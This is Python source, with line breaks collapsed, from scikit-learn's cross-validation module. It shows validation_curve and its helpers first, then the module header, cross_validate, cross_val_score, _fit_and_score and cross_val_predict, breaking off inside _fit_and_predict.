array-like of shape (n_ticks,) Numbers of training examples that will be used to generate the learning curve. If the dtype is float, it is regarded as a fraction of 'n_max_training_samples', i.e. it has to be within (0, 1]. n_max_training_samples : int Maximum number of training samples (upper bound of 'train_sizes'). Returns ------- train_sizes_abs : array of shape (n_unique_ticks,) Numbers of training examples that will be used to generate the learning curve. Note that the number of ticks might be less than n_ticks because duplicate entries will be removed. """ train_sizes_abs = np.asarray(train_sizes) n_ticks = train_sizes_abs.shape[0] n_min_required_samples = np.min(train_sizes_abs) n_max_required_samples = np.max(train_sizes_abs) if np.issubdtype(train_sizes_abs.dtype, np.floating): if n_min_required_samples <= 0.0 or n_max_required_samples > 1.0: raise ValueError("train_sizes has been interpreted as fractions " "of the maximum number of training samples and " "must be within (0, 1], but is within [%f, %f]." % (n_min_required_samples, n_max_required_samples)) train_sizes_abs = (train_sizes_abs * n_max_training_samples).astype( dtype=int, copy=False) train_sizes_abs = np.clip(train_sizes_abs, 1, n_max_training_samples) else: if (n_min_required_samples <= 0 or n_max_required_samples > n_max_training_samples): raise ValueError("train_sizes has been interpreted as absolute " "numbers of training samples and must be within " "(0, %d], but is within [%d, %d]." % (n_max_training_samples, n_min_required_samples, n_max_required_samples)) train_sizes_abs = np.unique(train_sizes_abs) if n_ticks > train_sizes_abs.shape[0]: warnings.warn("Removed duplicate entries from 'train_sizes'. Number " "of ticks will be less than the size of " "'train_sizes' %d instead of %d)." % (train_sizes_abs.shape[0], n_ticks), RuntimeWarning) return train_sizes_abs def _incremental_fit_estimator(estimator, X, y, classes, train, test, train_sizes, scorer, verbose, return_times, error_score, fit_params): """Train estimator on training subsets incrementally and compute scores.""" train_scores, test_scores, fit_times, score_times = [], [], [], [] partitions = zip(train_sizes, np.split(train, train_sizes)[:-1]) if fit_params is None: fit_params = {} for n_train_samples, partial_train in partitions: train_subset = train[:n_train_samples] X_train, y_train = _safe_split(estimator, X, y, train_subset) X_partial_train, y_partial_train = _safe_split(estimator, X, y, partial_train) X_test, y_test = _safe_split(estimator, X, y, test, train_subset) start_fit = time.time() if y_partial_train is None: estimator.partial_fit(X_partial_train, classes=classes, **fit_params) else: estimator.partial_fit(X_partial_train, y_partial_train, classes=classes, **fit_params) fit_time = time.time() - start_fit fit_times.append(fit_time) start_score = time.time() test_scores.append( _score(estimator, X_test, y_test, scorer, error_score) ) train_scores.append( _score(estimator, X_train, y_train, scorer, error_score) ) score_time = time.time() - start_score score_times.append(score_time) ret = ((train_scores, test_scores, fit_times, score_times) if return_times else (train_scores, test_scores)) return np.array(ret).T @_deprecate_positional_args def validation_curve(estimator, X, y, *, param_name, param_range, groups=None, cv=None, scoring=None, n_jobs=None, pre_dispatch="all", verbose=0, error_score=np.nan, fit_params=None): """Validation curve. Determine training and test scores for varying parameter values. Compute scores for an estimator with different values of a specified parameter. This is similar to grid search with one parameter. However, this will also compute training scores and is merely a utility for plotting the results. Read more in the :ref:`User Guide <validation_curve>`. Parameters ---------- estimator : object type that implements the "fit" and "predict" methods An object of that type which is cloned for each validation. X : array-like of shape (n_samples, n_features) Training vector, where n_samples is the number of samples and n_features is the number of features. y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None Target relative to X for classification or regression; None for unsupervised learning. param_name : str Name of the parameter that will be varied. param_range : array-like of shape (n_values,) The values of the parameter that will be evaluated. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. scoring : str or callable, default=None A str (see model evaluation documentation) or a scorer callable object / function with signature ``scorer(estimator, X, y)``. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the score are parallelized over the combinations of each parameter value and each cross-validation split. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. pre_dispatch : int or str, default='all' Number of predispatched jobs for parallel execution (default is all). The option can reduce the allocated memory. The str can be an expression like '2*n_jobs'. verbose : int, default=0 Controls the verbosity: the higher, the more messages. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. .. versionadded:: 0.24 error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. .. versionadded:: 0.20 Returns ------- train_scores : array of shape (n_ticks, n_cv_folds) Scores on training sets. test_scores : array of shape (n_ticks, n_cv_folds) Scores on test set. Notes ----- See :ref:`sphx_glr_auto_examples_model_selection_plot_validation_curve.py` """ X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) scorer = check_scoring(estimator, scoring=scoring) parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch, verbose=verbose) results = parallel(delayed(_fit_and_score)( clone(estimator), X, y, scorer, train, test, verbose, parameters={param_name: v}, fit_params=fit_params, return_train_score=True, error_score=error_score) # NOTE do not change order of iteration to allow one time cv splitters for train, test in cv.split(X, y, groups) for v in param_range) n_params = len(param_range) results = _aggregate_score_dicts(results) train_scores = results["train_scores"].reshape(-1, n_params).T test_scores = results["test_scores"].reshape(-1, n_params).T return train_scores, test_scores def _aggregate_score_dicts(scores): """Aggregate the list of dict to dict of np ndarray The aggregated output of _aggregate_score_dicts will be a list of dict of form [{'prec': 0.1, 'acc':1.0}, {'prec': 0.1, 'acc':1.0}, ...] Convert it to a dict of array {'prec': np.array([0.1 ...]), ...} Parameters ---------- scores : list of dict List of dicts of the scores for all scorers. This is a flat list, assumed originally to be of row major order. Example ------- >>> scores = [{'a': 1, 'b':10}, {'a': 2, 'b':2}, {'a': 3, 'b':3}, ... {'a': 10, 'b': 10}] # doctest: +SKIP >>> _aggregate_score_dicts(scores) # doctest: +SKIP {'a': array([1, 2, 3, 10]), 'b': array([10, 2, 3, 10])} """ return { key: np.asarray([score[key] for score in scores]) if isinstance(scores[0][key], (numbers.Number, np.ndarray)) else [score[key] for score in scores] for key in scores[0] }
""" The :mod:`sklearn.model_selection._validation` module includes classes and functions to validate the model. """ # Author: Alexandre Gramfort <alexandre.gramfort@inria.fr> # Gael Varoquaux <gael.varoquaux@normalesup.org> # Olivier Grisel <olivier.grisel@ensta.org> # Raghav RV <rvraghav93@gmail.com> # License: BSD 3 clause import warnings import numbers import time from traceback import format_exc from contextlib import suppress import numpy as np import scipy.sparse as sp from joblib import Parallel, logger from ..base import is_classifier, clone from ..utils import indexable, check_random_state, _safe_indexing from ..utils.validation import _check_fit_params from ..utils.validation import _num_samples from ..utils.validation import _deprecate_positional_args from ..utils.fixes import delayed from ..utils.metaestimators import _safe_split from ..metrics import check_scoring from ..metrics._scorer import _check_multimetric_scoring, _MultimetricScorer from ..exceptions import FitFailedWarning, NotFittedError from ._split import check_cv from ..preprocessing import LabelEncoder __all__ = ['cross_validate', 'cross_val_score', 'cross_val_predict', 'permutation_test_score', 'learning_curve', 'validation_curve'] @_deprecate_positional_args def cross_validate(estimator, X, y=None, *, groups=None, scoring=None, cv=None, n_jobs=None, verbose=0, fit_params=None, pre_dispatch='2*n_jobs', return_train_score=False, return_estimator=False, error_score=np.nan): """Evaluate metric(s) by cross-validation and also record fit/score times. Read more in the :ref:`User Guide <multimetric_cross_validation>`. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. Can be for example a list, or an array. y : array-like of shape (n_samples,) or (n_samples, n_outputs), \ default=None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). scoring : str, callable, list, tuple, or dict, default=None Strategy to evaluate the performance of the cross-validated model on the test set. If `scoring` represents a single score, one can use: - a single string (see :ref:`scoring_parameter`); - a callable (see :ref:`scoring`) that returns a single value. If `scoring` reprents multiple scores, one can use: - a list or tuple of unique strings; - a callable returning a dictionary where the keys are the metric names and the values are the metric scores; - a dictionary with metric names as keys and callables a values. See :ref:`multimetric_grid_search` for an example. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the score are parallelized over the cross-validation splits. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. verbose : int, default=0 The verbosity level. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. pre_dispatch : int or str, default='2*n_jobs' Controls the number of jobs that get dispatched during parallel execution. Reducing this number can be useful to avoid an explosion of memory consumption when more jobs get dispatched than CPUs can process. This parameter can be: - None, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs - An int, giving the exact number of total jobs that are spawned - A str, giving an expression as a function of n_jobs, as in '2*n_jobs' return_train_score : bool, default=False Whether to include train scores. Computing training scores is used to get insights on how different parameter settings impact the overfitting/underfitting trade-off. However computing the scores on the training set can be computationally expensive and is not strictly required to select the parameters that yield the best generalization performance. .. versionadded:: 0.19 .. versionchanged:: 0.21 Default value was changed from ``True`` to ``False`` return_estimator : bool, default=False Whether to return the estimators fitted on each split. .. versionadded:: 0.20 error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. .. versionadded:: 0.20 Returns ------- scores : dict of float arrays of shape (n_splits,) Array of scores of the estimator for each run of the cross validation. A dict of arrays containing the score/time arrays for each scorer is returned. The possible keys for this ``dict`` are: ``test_score`` The score array for test scores on each cv split. Suffix ``_score`` in ``test_score`` changes to a specific metric like ``test_r2`` or ``test_auc`` if there are multiple scoring metrics in the scoring parameter. ``train_score`` The score array for train scores on each cv split. Suffix ``_score`` in ``train_score`` changes to a specific metric like ``train_r2`` or ``train_auc`` if there are multiple scoring metrics in the scoring parameter. This is available only if ``return_train_score`` parameter is ``True``. ``fit_time`` The time for fitting the estimator on the train set for each cv split. ``score_time`` The time for scoring the estimator on the test set for each cv split. (Note time for scoring on the train set is not included even if ``return_train_score`` is set to ``True`` ``estimator`` The estimator objects for each cv split. This is available only if ``return_estimator`` parameter is set to ``True``. Examples -------- >>> from sklearn import datasets, linear_model >>> from sklearn.model_selection import cross_validate >>> from sklearn.metrics import make_scorer >>> from sklearn.metrics import confusion_matrix >>> from sklearn.svm import LinearSVC >>> diabetes = datasets.load_diabetes() >>> X = diabetes.data[:150] >>> y = diabetes.target[:150] >>> lasso = linear_model.Lasso() Single metric evaluation using ``cross_validate`` >>> cv_results = cross_validate(lasso, X, y, cv=3) >>> sorted(cv_results.keys()) ['fit_time', 'score_time', 'test_score'] >>> cv_results['test_score'] array([0.33150734, 0.08022311, 0.03531764]) Multiple metric evaluation using ``cross_validate`` (please refer the ``scoring`` parameter doc for more information) >>> scores = cross_validate(lasso, X, y, cv=3, ... scoring=('r2', 'neg_mean_squared_error'), ... return_train_score=True) >>> print(scores['test_neg_mean_squared_error']) [-3635.5... -3573.3... -6114.7...] >>> print(scores['train_r2']) [0.28010158 0.39088426 0.22784852] See Also --------- cross_val_score : Run cross-validation for single metric evaluation. cross_val_predict : Get predictions from each split of cross-validation for diagnostic purposes. sklearn.metrics.make_scorer : Make a scorer from a performance metric or loss function. """ X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) if callable(scoring): scorers = scoring elif scoring is None or isinstance(scoring, str): scorers = check_scoring(estimator, scoring) else: scorers = _check_multimetric_scoring(estimator, scoring) # We clone the estimator to make sure that all the folds are # independent, and that it is pickle-able. parallel = Parallel(n_jobs=n_jobs, verbose=verbose, pre_dispatch=pre_dispatch) results = parallel( delayed(_fit_and_score)( clone(estimator), X, y, scorers, train, test, verbose, None, fit_params, return_train_score=return_train_score, return_times=True, return_estimator=return_estimator, error_score=error_score) for train, test in cv.split(X, y, groups)) # For callabe scoring, the return type is only know after calling. If the # return type is a dictionary, the error scores can now be inserted with # the correct key. if callable(scoring): _insert_error_scores(results, error_score) results = _aggregate_score_dicts(results) ret = {} ret['fit_time'] = results["fit_time"] ret['score_time'] = results["score_time"] if return_estimator: ret['estimator'] = results["estimator"] test_scores_dict = _normalize_score_results(results["test_scores"]) if return_train_score: train_scores_dict = _normalize_score_results(results["train_scores"]) for name in test_scores_dict: ret['test_%s' % name] = test_scores_dict[name] if return_train_score: key = 'train_%s' % name ret[key] = train_scores_dict[name] return ret def _insert_error_scores(results, error_score): """Insert error in `results` by replacing them inplace with `error_score`. This only applies to multimetric scores because `_fit_and_score` will handle the single metric case. """ successful_score = None failed_indices = [] for i, result in enumerate(results): if result["fit_failed"]: failed_indices.append(i) elif successful_score is None: successful_score = result["test_scores"] if successful_score is None: raise NotFittedError("All estimators failed to fit") if isinstance(successful_score, dict): formatted_error = {} for name, score in successful_score.items(): if isinstance(score, np.ndarray) and error_score != 'raise': formatted_error[name] = np.full_like(score, error_score) else: formatted_error[name] = error_score for i in failed_indices: results[i]["test_scores"] = formatted_error.copy() if "train_scores" in results[i]: results[i]["train_scores"] = formatted_error.copy() def _normalize_score_results(scores, scaler_score_key='score'): """Creates a scoring dictionary based on the type of `scores`""" if isinstance(scores[0], dict): # multimetric scoring return _aggregate_score_dicts(scores) # scaler return {scaler_score_key: scores} @_deprecate_positional_args def cross_val_score(estimator, X, y=None, *, groups=None, scoring=None, cv=None, n_jobs=None, verbose=0, fit_params=None, pre_dispatch='2*n_jobs', error_score=np.nan): """Evaluate a score by cross-validation Read more in the :ref:`User Guide <cross_validation>`. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. Can be for example a list, or an array. y : array-like of shape (n_samples,) or (n_samples, n_outputs), \ default=None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). scoring : str or callable, default=None A str (see model evaluation documentation) or a scorer callable object / function with signature ``scorer(estimator, X, y)`` which should return only a single value. Similar to :func:`cross_validate` but only a single metric is permitted. If None, the estimator's default scorer (if available) is used. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the score are parallelized over the cross-validation splits. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. verbose : int, default=0 The verbosity level. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. pre_dispatch : int or str, default='2*n_jobs' Controls the number of jobs that get dispatched during parallel execution. Reducing this number can be useful to avoid an explosion of memory consumption when more jobs get dispatched than CPUs can process. This parameter can be: - None, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs - An int, giving the exact number of total jobs that are spawned - A str, giving an expression as a function of n_jobs, as in '2*n_jobs' error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. .. versionadded:: 0.20 Returns ------- scores : ndarray of float of shape=(len(list(cv)),) Array of scores of the estimator for each run of the cross validation. Examples -------- >>> from sklearn import datasets, linear_model >>> from sklearn.model_selection import cross_val_score >>> diabetes = datasets.load_diabetes() >>> X = diabetes.data[:150] >>> y = diabetes.target[:150] >>> lasso = linear_model.Lasso() >>> print(cross_val_score(lasso, X, y, cv=3)) [0.33150734 0.08022311 0.03531764] See Also --------- cross_validate : To run cross-validation on multiple metrics and also to return train scores, fit times and score times. cross_val_predict : Get predictions from each split of cross-validation for diagnostic purposes. sklearn.metrics.make_scorer : Make a scorer from a performance metric or loss function. """ # To ensure multimetric format is not supported scorer = check_scoring(estimator, scoring=scoring) cv_results = cross_validate(estimator=estimator, X=X, y=y, groups=groups, scoring={'score': scorer}, cv=cv, n_jobs=n_jobs, verbose=verbose, fit_params=fit_params, pre_dispatch=pre_dispatch, error_score=error_score) return cv_results['test_score'] def _fit_and_score(estimator, X, y, scorer, train, test, verbose, parameters, fit_params, return_train_score=False, return_parameters=False, return_n_test_samples=False, return_times=False, return_estimator=False, split_progress=None, candidate_progress=None, error_score=np.nan): """Fit estimator and compute scores for a given dataset split. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None The target variable to try to predict in the case of supervised learning. scorer : A single callable or dict mapping scorer name to the callable If it is a single callable, the return value for ``train_scores`` and ``test_scores`` is a single float. For a dict, it should be one mapping the scorer name to the scorer callable object / function. The callable object / fn should have signature ``scorer(estimator, X, y)``. train : array-like of shape (n_train_samples,) Indices of training samples. test : array-like of shape (n_test_samples,) Indices of test samples. verbose : int The verbosity level. error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. parameters : dict or None Parameters to be set on the estimator. fit_params : dict or None Parameters that will be passed to ``estimator.fit``. return_train_score : bool, default=False Compute and return score on training set. return_parameters : bool, default=False Return parameters that has been used for the estimator. split_progress : {list, tuple} of int, default=None A list or tuple of format (<current_split_id>, <total_num_of_splits>). candidate_progress : {list, tuple} of int, default=None A list or tuple of format (<current_candidate_id>, <total_number_of_candidates>). return_n_test_samples : bool, default=False Whether to return the ``n_test_samples``. return_times : bool, default=False Whether to return the fit/score times. return_estimator : bool, default=False Whether to return the fitted estimator. Returns ------- result : dict with the following attributes train_scores : dict of scorer name -> float Score on training set (for all the scorers), returned only if `return_train_score` is `True`. test_scores : dict of scorer name -> float Score on testing set (for all the scorers). n_test_samples : int Number of test samples. fit_time : float Time spent for fitting in seconds. score_time : float Time spent for scoring in seconds. parameters : dict or None The parameters that have been evaluated. estimator : estimator object The fitted estimator. fit_failed : bool The estimator failed to fit. """ if not isinstance(error_score, numbers.Number) and error_score != 'raise': raise ValueError( "error_score must be the string 'raise' or a numeric value. " "(Hint: if using 'raise', please make sure that it has been " "spelled correctly.)" ) progress_msg = "" if verbose > 2: if split_progress is not None: progress_msg = f" {split_progress[0]+1}/{split_progress[1]}" if candidate_progress and verbose > 9: progress_msg += (f"; {candidate_progress[0]+1}/" f"{candidate_progress[1]}") if verbose > 1: if parameters is None: params_msg = '' else: sorted_keys = sorted(parameters) # Ensure deterministic o/p params_msg = (', '.join(f'{k}={parameters[k]}' for k in sorted_keys)) if verbose > 9: start_msg = f"[CV{progress_msg}] START {params_msg}" print(f"{start_msg}{(80 - len(start_msg)) * '.'}") # Adjust length of sample weights fit_params = fit_params if fit_params is not None else {} fit_params = _check_fit_params(X, fit_params, train) if parameters is not None: # clone after setting parameters in case any parameters # are estimators (like pipeline steps) # because pipeline doesn't clone steps in fit cloned_parameters = {} for k, v in parameters.items(): cloned_parameters[k] = clone(v, safe=False) estimator = estimator.set_params(**cloned_parameters) start_time = time.time() X_train, y_train = _safe_split(estimator, X, y, train) X_test, y_test = _safe_split(estimator, X, y, test, train) result = {} try: if y_train is None: estimator.fit(X_train, **fit_params) else: estimator.fit(X_train, y_train, **fit_params) except Exception as e: # Note fit time as time until error fit_time = time.time() - start_time score_time = 0.0 if error_score == 'raise': raise elif isinstance(error_score, numbers.Number): if isinstance(scorer, dict): test_scores = {name: error_score for name in scorer} if return_train_score: train_scores = test_scores.copy() else: test_scores = error_score if return_train_score: train_scores = error_score warnings.warn("Estimator fit failed. The score on this train-test" " partition for these parameters will be set to %f. " "Details: \n%s" % (error_score, format_exc()), FitFailedWarning) result["fit_failed"] = True else: fit_time = time.time() - start_time with warnings.catch_warnings(record=True) as score_warnings: test_scores = _score(estimator, X_test, y_test, scorer, error_score) score_time = time.time() - start_time - fit_time if return_train_score: train_scores = _score( estimator, X_train, y_train, scorer, error_score ) if score_warnings: result["fit_failed"] = True for w in score_warnings: warnings.showwarning(w.message, w.category, w.filename, w.lineno, w.file, w.line) else: result["fit_failed"] = False if verbose > 1: total_time = score_time + fit_time end_msg = f"[CV{progress_msg}] END " result_msg = params_msg + (";" if params_msg else "") if verbose > 2: if isinstance(test_scores, dict): for scorer_name in sorted(test_scores): result_msg += f" {scorer_name}=" if isinstance(test_scores[scorer_name], np.ndarray): fmt_str = '' else: fmt_str = '.3f' if return_train_score: scorer_scores = train_scores[scorer_name] result_msg += f"(train={scorer_scores:{fmt_str}}, test={test_scores[scorer_name]:{fmt_str}})," else: result_msg += f"{test_scores[scorer_name]:{fmt_str}}," else: result_msg += " score=" result_msg += (f"{test_scores:.3f}," if not return_train_score else f"(train={train_scores:.3f}, test={test_scores:.3f}),") result_msg += f" total time={logger.short_format_time(total_time)}" # Right align the result_msg end_msg += "." * (80 - len(end_msg) - len(result_msg)) end_msg += result_msg print(end_msg) result["test_scores"] = test_scores if return_train_score: result["train_scores"] = train_scores if return_n_test_samples: result["n_test_samples"] = _num_samples(X_test) if return_times: result["fit_time"] = fit_time result["score_time"] = score_time if return_parameters: result["parameters"] = parameters if return_estimator: result["estimator"] = estimator return result def _score(estimator, X_test, y_test, scorer, error_score="raise"): """Compute the score(s) of an estimator on a given test set. Will return a dict of floats if `scorer` is a dict, otherwise a single float is returned. """ if isinstance(scorer, dict): # will cache method calls if needed. scorer() returns a dict scorer = _MultimetricScorer(**scorer) try: if y_test is None: scores = scorer(estimator, X_test) else: scores = scorer(estimator, X_test, y_test) except Exception: if error_score == 'raise': raise else: if isinstance(scorer, _MultimetricScorer): scores = {name: error_score for name in scorer._scorers} else: scores = error_score warnings.warn( f"Scoring failed. The score on this train-test partition for " f"these parameters will be set to {error_score}. Details: \n" f"{format_exc()}", UserWarning, ) error_msg = ( "scoring must return a number, got %s (%s) instead. (scorer=%s)" ) if isinstance(scores, dict): for name, score in scores.items(): if hasattr(score, 'item'): with suppress(ValueError): # e.g. unwrap memmapped scalars score = score.item() elif isinstance(score, tuple): score = np.stack(score) if not isinstance(score, (numbers.Number, np.ndarray)): raise ValueError(error_msg % (score, type(score), name)) scores[name] = score else: # scalar if hasattr(scores, 'item'): with suppress(ValueError): # e.g. unwrap memmapped scalars scores = scores.item() if not isinstance(scores, numbers.Number): raise ValueError(error_msg % (scores, type(scores), scorer)) return scores @_deprecate_positional_args def cross_val_predict(estimator, X, y=None, *, groups=None, cv=None, n_jobs=None, verbose=0, fit_params=None, pre_dispatch='2*n_jobs', method='predict'): """Generate cross-validated estimates for each input data point The data is split according to the cv parameter. Each sample belongs to exactly one test set, and its prediction is computed with an estimator fitted on the corresponding training set. Passing these predictions into an evaluation metric may not be a valid way to measure generalization performance. Results can differ from :func:`cross_validate` and :func:`cross_val_score` unless all tests sets have equal size and the metric decomposes over samples. Read more in the :ref:`User Guide <cross_validation>`. Parameters ---------- estimator : estimator object implementing 'fit' and 'predict' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. Can be, for example a list, or an array at least 2d. y : array-like of shape (n_samples,) or (n_samples, n_outputs), \ default=None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and predicting are parallelized over the cross-validation splits. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. verbose : int, default=0 The verbosity level. fit_params : dict, defualt=None Parameters to pass to the fit method of the estimator. pre_dispatch : int or str, default='2*n_jobs' Controls the number of jobs that get dispatched during parallel execution. Reducing this number can be useful to avoid an explosion of memory consumption when more jobs get dispatched than CPUs can process. This parameter can be: - None, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs - An int, giving the exact number of total jobs that are spawned - A str, giving an expression as a function of n_jobs, as in '2*n_jobs' method : {'predict', 'predict_proba', 'predict_log_proba', \ 'decision_function'}, default='predict' The method to be invoked by `estimator`. Returns ------- predictions : ndarray This is the result of calling `method`. Shape: - When `method` is 'predict' and in special case where `method` is 'decision_function' and the target is binary: (n_samples,) - When `method` is one of {'predict_proba', 'predict_log_proba', 'decision_function'} (unless special case above): (n_samples, n_classes) - If `estimator` is :term:`multioutput`, an extra dimension 'n_outputs' is added to the end of each shape above. See Also -------- cross_val_score : Calculate score for each CV split. cross_validate : Calculate one or more scores and timings for each CV split. Notes ----- In the case that one or more classes are absent in a training portion, a default score needs to be assigned to all instances for that class if ``method`` produces columns per class, as in {'decision_function', 'predict_proba', 'predict_log_proba'}. For ``predict_proba`` this value is 0. In order to ensure finite output, we approximate negative infinity by the minimum finite float value for the dtype in other cases. Examples -------- >>> from sklearn import datasets, linear_model >>> from sklearn.model_selection import cross_val_predict >>> diabetes = datasets.load_diabetes() >>> X = diabetes.data[:150] >>> y = diabetes.target[:150] >>> lasso = linear_model.Lasso() >>> y_pred = cross_val_predict(lasso, X, y, cv=3) """ X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) splits = list(cv.split(X, y, groups)) test_indices = np.concatenate([test for _, test in splits]) if not _check_is_permutation(test_indices, _num_samples(X)): raise ValueError('cross_val_predict only works for partitions') # If classification methods produce multiple columns of output, # we need to manually encode classes to ensure consistent column ordering. encode = method in ['decision_function', 'predict_proba', 'predict_log_proba'] and y is not None if encode: y = np.asarray(y) if y.ndim == 1: le = LabelEncoder() y = le.fit_transform(y) elif y.ndim == 2: y_enc = np.zeros_like(y, dtype=int) for i_label in range(y.shape[1]): y_enc[:, i_label] = LabelEncoder().fit_transform(y[:, i_label]) y = y_enc # We clone the estimator to make sure that all the folds are # independent, and that it is pickle-able. parallel = Parallel(n_jobs=n_jobs, verbose=verbose, pre_dispatch=pre_dispatch) predictions = parallel(delayed(_fit_and_predict)( clone(estimator), X, y, train, test, verbose, fit_params, method) for train, test in splits) inv_test_indices = np.empty(len(test_indices), dtype=int) inv_test_indices[test_indices] = np.arange(len(test_indices)) if sp.issparse(predictions[0]): predictions = sp.vstack(predictions, format=predictions[0].format) elif encode and isinstance(predictions[0], list): # `predictions` is a list of method outputs from each fold. # If each of those is also a list, then treat this as a # multioutput-multiclass task. We need to separately concatenate # the method outputs for each label into an `n_labels` long list. n_labels = y.shape[1] concat_pred = [] for i_label in range(n_labels): label_preds = np.concatenate([p[i_label] for p in predictions]) concat_pred.append(label_preds) predictions = concat_pred else: predictions = np.concatenate(predictions) if isinstance(predictions, list): return [p[inv_test_indices] for p in predictions] else: return predictions[inv_test_indices] def _fit_and_predict(estimator, X, y, train, test, verbose, fit_params, method): """Fit estimator and predict values for a given dataset split. Read more in the :ref:`User Guide <cross_validation>`. Parameters ---------- estimator : estimator object implementing 'fit' and 'predict' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. .. versionchanged:: 0.20 X is only required to be an object with finite length or shape now y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None The target variable to try to predict in the case of supervised learning. train : array-like of shape (n_train_samples,) Indices of training samples. test : array-like of shape (n_test_samples,) Indices of test samples. verbose : int The verbosity level. fit_params : dict or None Parameters that will be passed to ``estimator.fit``. method : str Invokes the passed method name of the passed estimator. Returns ------- predictions : sequence Result of calling 'estimator.method' """ # Adjust length of sample weights fit_params = fit_params if fit_params is not None else {} fit_params = _check_fit_params(X, fit_params, train) X_train, y_train = _safe_split(estimator, X, y, train) X_test, _ = _safe_split(estimator, X, y, test, train) if y_train is None: estimator.fit(X_train, **fit_params) else: estimator.fit(X_train, y_train, **fit_params) func = getattr(estimator, method) predictions = func(X_test) encode = method in ['decision_function', 'predict_proba', 'predict_log_proba'] and y is not None if encode: if isinstance(predictions, list): predictions = 